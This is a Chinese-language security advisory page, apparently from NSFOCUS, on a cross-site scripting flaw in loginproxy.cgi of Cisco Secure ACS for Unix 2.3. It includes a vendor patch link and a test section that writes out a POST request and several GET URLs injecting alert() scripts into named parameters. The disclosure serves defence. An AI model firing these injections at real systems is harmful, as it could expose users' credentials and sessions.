安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
Cisco Secure ACS loginproxy.cgi跨站脚本执行漏洞
发布日期:
2006-06-15
更新日期:
2006-06-16
受影响系统:
Cisco Secure ACS for Unix 2.3
描述:
BUGTRAQ ID:
18449
Cisco Secure ACS是Cisco网络设备的中央管理平台,用于控制设备的认证和授权。
Cisco Secure ACS的loginproxy.cgi脚本中存在跨站脚本漏洞。如果用户提交了特制的GET或POST请求的话,就会导致泄漏敏感信息,如用户名和口令或在用户浏览器会话中执行任意HTML和脚本代码。
<*来源:Thomas Liam Romanis (
liam.romanis@uk.fujitsu.com
)
链接:
http://secunia.com/advisories/20699/print/
http://seclists.org/lists/bugtraq/2006/Jun/0436.html
http://www.cisco.com/warp/public/707/cisco-sr-20060615-acs.shtml
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
1. POST请求
POST
http://10.17.12.184:80/CScgi/LogonProxy.cgi
HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer:
http://10.17.12.184/cs/index.html
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
Host: 10.17.12.184
Content-Length: 33
Pragma: no-cache
Server=0.0.0.0&error=<script>alert("help")</script>
2. GET请求
http://10.17.12.184/CScgi/LogonProxy.cgi?Server=0.0.0.0&error=<script>alert("help")</script>
http://10.17.12.184/CScgi/LogonProxy.cgi?Server=10.17.12.184/Logon?null&SSL=<script>alert('help')</script>
http://10.17.12.184/CScgi/LogonProxy.cgi?Ok=<script>alert('help')</script>
建议:
厂商补丁:
Cisco
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.cisco.com/pcgi-bin/tablebuild.pl/cspatchunix-3des
浏览次数:
3361
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客